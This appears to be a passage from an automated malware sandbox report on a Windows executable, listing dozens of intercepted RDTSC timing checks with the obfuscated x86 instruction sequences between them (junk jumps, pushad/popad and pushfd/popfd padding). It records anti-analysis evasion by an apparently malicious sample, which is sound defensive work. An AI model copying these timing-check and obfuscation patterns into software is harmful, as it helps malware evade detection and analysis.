rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030168 second address: 7030178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030178 second address: 703017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 703017C second address: 7030190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [775606ECh] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030190 second address: 7030194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030194 second address: 70301AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 70301AC second address: 70301C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov si, F7D1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 70301C4 second address: 7030238 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD934BC97DEh 0x00000008 sbb eax, 368C5E28h 0x0000000e jmp 00007FD934BC97DBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FD934BC97E8h 0x0000001c xor ecx, 7B721088h 0x00000022 jmp 00007FD934BC97DBh 0x00000027 popfd 0x00000028 popad 0x00000029 jne 00007FD934BCA586h 0x0000002f jmp 00007FD934BC97E6h 0x00000034 xchg eax, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030238 second address: 7030255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030255 second address: 7030265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030265 second address: 7030269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030269 second address: 7030281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD934BC97DDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030281 second address: 703030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FD934C4561Eh 0x0000000f call dword ptr [77530B60h] 0x00000015 mov eax, 756AE5E0h 0x0000001a ret 0x0000001b jmp 00007FD934C45620h 0x00000020 push 00000044h 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FD934C4561Eh 0x00000029 jmp 00007FD934C45625h 0x0000002e popfd 0x0000002f mov edx, esi 0x00000031 popad 0x00000032 pop edi 0x00000033 jmp 00007FD934C4561Ah 0x00000038 xchg eax, edi 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FD934C45627h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 703030B second address: 703033F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934BC97DFh 0x00000009 and si, 75BEh 0x0000000e jmp 00007FD934BC97E9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030438 second address: 7030553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934C4561Fh 0x00000009 or ch, 0000006Eh 0x0000000c jmp 00007FD934C45629h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FD934C45620h 0x00000018 or ecx, 726418E8h 0x0000001e jmp 00007FD934C4561Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov dword ptr [esi+08h], eax 0x0000002a jmp 00007FD934C45626h 0x0000002f mov dword ptr [esi+0Ch], eax 0x00000032 jmp 00007FD934C45620h 0x00000037 mov eax, dword ptr [ebx+4Ch] 0x0000003a jmp 00007FD934C45620h 0x0000003f mov dword ptr [esi+10h], eax 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FD934C4561Eh 0x00000049 sub esi, 03EF10D8h 0x0000004f jmp 00007FD934C4561Bh 0x00000054 popfd 0x00000055 pushfd 0x00000056 jmp 00007FD934C45628h 0x0000005b adc esi, 5BC3DB38h 0x00000061 jmp 00007FD934C4561Bh 0x00000066 popfd 0x00000067 popad 0x00000068 mov eax, dword ptr [ebx+50h] 0x0000006b jmp 00007FD934C45626h 0x00000070 mov dword ptr [esi+14h], eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007FD934C45627h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030553 second address: 70305BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007FD934BC97DEh 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD934BC97DDh 0x0000001d jmp 00007FD934BC97DBh 0x00000022 popfd 0x00000023 jmp 00007FD934BC97E8h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 70305BA second address: 703067B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD934C45625h 0x00000012 adc eax, 46563206h 0x00000018 jmp 00007FD934C45621h 0x0000001d popfd 0x0000001e mov bl, ch 0x00000020 popad 0x00000021 mov dword ptr [esi+1Ch], eax 0x00000024 jmp 00007FD934C45623h 0x00000029 mov eax, dword ptr [ebx+5Ch] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FD934C45624h 0x00000033 sub ecx, 54E8B308h 0x00000039 jmp 00007FD934C4561Bh 0x0000003e popfd 0x0000003f pushfd 0x00000040 jmp 00007FD934C45628h 0x00000045 add ch, 00000068h 0x00000048 jmp 00007FD934C4561Bh 0x0000004d popfd 0x0000004e popad 0x0000004f mov dword ptr [esi+20h], eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FD934C45625h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 703067B second address: 703071A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 36D34612h 0x00000008 call 00007FD934BC97E3h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [ebx+60h] 0x00000014 jmp 00007FD934BC97DFh 0x00000019 mov dword ptr [esi+24h], eax 0x0000001c jmp 00007FD934BC97E6h 0x00000021 mov eax, dword ptr [ebx+64h] 0x00000024 jmp 00007FD934BC97E0h 0x00000029 mov dword ptr [esi+28h], eax 0x0000002c jmp 00007FD934BC97E0h 0x00000031 mov eax, dword ptr [ebx+68h] 0x00000034 jmp 00007FD934BC97E0h 0x00000039 mov dword ptr [esi+2Ch], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FD934BC97E7h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 703071A second address: 7030811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007FD934C4561Bh 0x0000000c sub al, FFFFFF8Eh 0x0000000f jmp 00007FD934C45629h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ax, word ptr [ebx+6Ch] 0x0000001c jmp 00007FD934C4561Eh 0x00000021 mov word ptr [esi+30h], ax 0x00000025 jmp 00007FD934C45620h 0x0000002a mov ax, word ptr [ebx+00000088h] 0x00000031 jmp 00007FD934C45620h 0x00000036 mov word ptr [esi+32h], ax 0x0000003a jmp 00007FD934C45620h 0x0000003f mov eax, dword ptr [ebx+0000008Ch] 0x00000045 jmp 00007FD934C45620h 0x0000004a mov dword ptr [esi+34h], eax 0x0000004d jmp 00007FD934C45620h 0x00000052 mov eax, dword ptr [ebx+18h] 0x00000055 jmp 00007FD934C45620h 0x0000005a mov dword ptr [esi+38h], eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 mov esi, edx 0x00000062 pushfd 0x00000063 jmp 00007FD934C45629h 0x00000068 or ch, 00000046h 0x0000006b jmp 00007FD934C45621h 0x00000070 popfd 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030811 second address: 7030821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030821 second address: 7030825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030825 second address: 7030845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+1Ch] 0x0000000b pushad 0x0000000c mov bx, B600h 0x00000010 mov dx, 322Ch 0x00000014 popad 0x00000015 mov dword ptr [esi+3Ch], eax 0x00000018 pushad 0x00000019 movsx edx, cx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030955 second address: 70309E9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 05A4DFE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b pushad 0x0000000c call 00007FD934C45628h 0x00000011 push esi 0x00000012 pop edi 0x00000013 pop esi 0x00000014 mov cl, dh 0x00000016 popad 0x00000017 lea eax, dword ptr [ebp-10h] 0x0000001a pushad 0x0000001b movzx esi, dx 0x0000001e pushfd 0x0000001f jmp 00007FD934C45621h 0x00000024 sbb eax, 1D26CC66h 0x0000002a jmp 00007FD934C45621h 0x0000002f popfd 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 pushfd 0x00000038 jmp 00007FD934C45629h 0x0000003d sub cx, DC76h 0x00000042 jmp 00007FD934C45621h 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 70309E9 second address: 70309F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 70309F9 second address: 7030A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD934C45623h 0x00000012 and cl, 0000005Eh 0x00000015 jmp 00007FD934C45629h 0x0000001a popfd 0x0000001b mov eax, 141C6327h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030B0E second address: 7030B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030B14 second address: 7030B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030B18 second address: 7030B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b jmp 00007FD934BC97E7h 0x00000010 lea eax, dword ptr [ebx+78h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FD934BC97E4h 0x0000001a or ah, FFFFFFF8h 0x0000001d jmp 00007FD934BC97DBh 0x00000022 popfd 0x00000023 mov ecx, 17F24C2Fh 0x00000028 popad 0x00000029 push 00000001h 0x0000002b jmp 00007FD934BC97E2h 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FD934BC97DDh 0x0000003a jmp 00007FD934BC97DBh 0x0000003f popfd 0x00000040 mov dx, cx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030B9E second address: 7030BBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45625h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030BBE second address: 7030BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030BC4 second address: 7030C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 pushfd 0x00000006 jmp 00007FD934C4561Ch 0x0000000b xor ah, 00000048h 0x0000000e jmp 00007FD934C4561Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 jmp 00007FD934C45626h 0x0000001d lea eax, dword ptr [ebp-08h] 0x00000020 pushad 0x00000021 mov dh, ch 0x00000023 pushad 0x00000024 mov cx, dx 0x00000027 popad 0x00000028 popad 0x00000029 push esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD934C45623h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030C21 second address: 7030C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030C27 second address: 7030C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030C2B second address: 7030C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD934BC97E5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030CE3 second address: 7030CF4 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 lea eax, dword ptr [ebx+70h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030CF4 second address: 7030CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030CF8 second address: 7030CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030CFE second address: 7030D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030D04 second address: 7030D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030D08 second address: 7030D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b mov ebx, 77FE0060h 0x00000010 mov cx, bx 0x00000013 popad 0x00000014 push ecx 0x00000015 pushad 0x00000016 movzx eax, di 0x00000019 movsx edi, ax 0x0000001c popad 0x0000001d mov dword ptr [esp], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030D2E second address: 7030D34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030D34 second address: 7030D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97E5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030D4D second address: 7030D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030DCB second address: 7030E41 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD934BC97E8h 0x00000008 add cl, FFFFFFB8h 0x0000000b jmp 00007FD934BC97DBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov esi, 6A2DDDEFh 0x00000018 popad 0x00000019 js 00007FD9A5078088h 0x0000001f pushad 0x00000020 mov di, ax 0x00000023 pushfd 0x00000024 jmp 00007FD934BC97DCh 0x00000029 adc eax, 32082418h 0x0000002f jmp 00007FD934BC97DBh 0x00000034 popfd 0x00000035 popad 0x00000036 mov eax, dword ptr [ebp-14h] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FD934BC97E5h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030E41 second address: 7030F0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934C45627h 0x00000009 or ax, AE3Eh 0x0000000e jmp 00007FD934C45629h 0x00000013 popfd 0x00000014 call 00007FD934C45620h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ecx, esi 0x0000001f pushad 0x00000020 pushad 0x00000021 mov di, 7150h 0x00000025 mov eax, ebx 0x00000027 popad 0x00000028 call 00007FD934C45625h 0x0000002d pushad 0x0000002e popad 0x0000002f pop esi 0x00000030 popad 0x00000031 mov dword ptr [esi+0Ch], eax 0x00000034 jmp 00007FD934C4561Dh 0x00000039 mov edx, 775606ECh 0x0000003e pushad 0x0000003f mov esi, 64D1DAE3h 0x00000044 mov di, ax 0x00000047 popad 0x00000048 sub eax, eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d movzx eax, dx 0x00000050 pushfd 0x00000051 jmp 00007FD934C45629h 0x00000056 xor ch, FFFFFF96h 0x00000059 jmp 00007FD934C45621h 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030F0A second address: 7030F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030F1A second address: 7030F3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lock cmpxchg dword ptr [edx], ecx 0x0000000f pushad 0x00000010 mov ecx, 5177A90Bh 0x00000015 mov ch, CAh 0x00000017 popad 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030F3F second address: 7030F45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030F45 second address: 7030FEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45627h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD934C45621h 0x00000013 adc cl, 00000066h 0x00000016 jmp 00007FD934C45621h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FD934C45620h 0x00000022 adc si, 4B08h 0x00000027 jmp 00007FD934C4561Bh 0x0000002c popfd 0x0000002d popad 0x0000002e popad 0x0000002f jne 00007FD9A50F3D43h 0x00000035 jmp 00007FD934C45626h 0x0000003a mov edx, dword ptr [ebp+08h] 0x0000003d jmp 00007FD934C45620h 0x00000042 mov eax, dword ptr [esi] 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FD934C4561Ah 0x0000004d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030FEE second address: 7030FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030FF2 second address: 7030FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030FF8 second address: 7031056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934BC97DCh 0x00000009 or ecx, 1B9E2AF8h 0x0000000f jmp 00007FD934BC97DBh 0x00000014 popfd 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [edx], eax 0x0000001d pushad 0x0000001e mov si, di 0x00000021 pushfd 0x00000022 jmp 00007FD934BC97DDh 0x00000027 and esi, 26D3B796h 0x0000002d jmp 00007FD934BC97E1h 0x00000032 popfd 0x00000033 popad 0x00000034 mov eax, dword ptr [esi+04h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7031056 second address: 703105A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 703105A second address: 703106D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 703106D second address: 7031116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c jmp 00007FD934C4561Eh 0x00000011 mov eax, dword ptr [esi+08h] 0x00000014 jmp 00007FD934C45620h 0x00000019 mov dword ptr [edx+08h], eax 0x0000001c jmp 00007FD934C45620h 0x00000021 mov eax, dword ptr [esi+0Ch] 0x00000024 pushad 0x00000025 mov ebx, eax 0x00000027 mov bl, ch 0x00000029 popad 0x0000002a mov dword ptr [edx+0Ch], eax 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FD934C45627h 0x00000034 xor cl, FFFFFF9Eh 0x00000037 jmp 00007FD934C45629h 0x0000003c popfd 0x0000003d popad 0x0000003e mov eax, dword ptr [esi+10h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD934C4561Dh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7031116 second address: 70311DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c pushad 0x0000000d call 00007FD934BC97DCh 0x00000012 mov esi, 2CE022D1h 0x00000017 pop eax 0x00000018 mov di, AAC2h 0x0000001c popad 0x0000001d mov eax, dword ptr [esi+14h] 0x00000020 pushad 0x00000021 jmp 00007FD934BC97DFh 0x00000026 push ecx 0x00000027 movsx edx, cx 0x0000002a pop esi 0x0000002b popad 0x0000002c mov dword ptr [edx+14h], eax 0x0000002f pushad 0x00000030 mov ax, dx 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FD934BC97DFh 0x0000003a and eax, 77F0AF1Eh 0x00000040 jmp 00007FD934BC97E9h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007FD934BC97E0h 0x0000004c and cx, DD18h 0x00000051 jmp 00007FD934BC97DBh 0x00000056 popfd 0x00000057 popad 0x00000058 popad 0x00000059 mov eax, dword ptr [esi+18h] 0x0000005c jmp 00007FD934BC97E6h 0x00000061 mov dword ptr [edx+18h], eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70311DD second address: 70311FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 703139F second address: 70313D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 070Eh 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov word ptr [edx+32h], ax 0x00000010 jmp 00007FD934BC97E1h 0x00000015 mov eax, dword ptr [esi+34h] 0x00000018 pushad 0x00000019 call 00007FD934BC97DCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
